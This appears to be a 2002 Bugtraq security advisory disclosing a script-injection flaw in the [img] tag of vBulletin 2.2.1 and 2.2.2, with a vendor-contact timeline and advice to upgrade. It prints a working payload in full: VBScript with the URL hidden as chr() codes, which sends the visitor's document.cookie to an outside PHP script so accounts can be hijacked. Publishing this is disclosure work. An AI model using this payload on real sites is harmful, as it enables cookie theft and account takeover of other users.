[24777] in bugtraq
[img]-vulnerability in vBulletin Version 2.2.2 & 2.2.1 & maybe olders
daemon@ATHENA.MIT.EDU (Cano2)
Thu Mar 21 03:01:42 2002
Date: Wed, 20 Mar 2002 19:29:30 +0100
From: Cano2 <Cano2@buhaboard.de>
Reply-To: Cano2 <Cano2@buhaboard.de>
Message-ID: <6616824973.20020320192930@buhaboard.de>
To: bugtraq@securityfocus.com
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
Hi
I've discovered a vulnerability in the vBulletins's [img]-Tag
implementation,
that allows users to inject vbs-code in posts and private messages
([img] is switched on by default).
Through that, an attacker is able to steal other users cookies and
maybe hijack their accounts.
The following code sends the user's cookie to a php-script
(http://www.ignite.barrysworld.net/test.php?c= in this case, which
just prints it back to the browser)
It is enclosed in [code]-Tag, the url is encoded in ascii and
linebreaks are inserted to avoid filtering of some characters and
insertion of <br>-Tags
[code][img]vbscript:location.replace(
chr(104)+chr(116)+chr(116)+chr(112)+chr(58)+
chr(47)+chr(47)+chr(119)+chr(119)+chr(119)+
chr(46)+chr(105)+chr(103)+chr(110)+chr(105)+
chr(116)+chr(101)+chr(46)+chr(98)+chr(97)+
chr(114)+chr(114)+chr(121)+chr(115)+chr(119)+
chr(111)+chr(114)+chr(108)+chr(100)+chr(46)+
chr(110)+chr(101)+chr(116)+chr(47)+chr(116)+
chr(101)+chr(115)+chr(116)+chr(46)+chr(112)+
chr(104)+chr(112)+chr(63)+chr(99)+chr(61)+
escape(document.cookie)
)[/img][/code]
History:
Feb 19 02: contacted Jelsoft
Feb 20 02: Vendor confirmed the bug
Feb 21 02: Jelsoft claimed to have made a patch "which clamps
down on what characters are allowed in an [img] tag,
as well as requiring it to start with http://".
Sounds good ;)
vBulletin 2.2.3 & 2.2.4 are out for some weeks, but there are still
sites using vulnerable versions, so better update!
lates, Cano2 mailto:Cano2@buhaboard.de
--
Wirklich reich sind die, die mehr Träume haben als die Realität zerstören kann
BuHa-Security Board
www.buhaboard.de
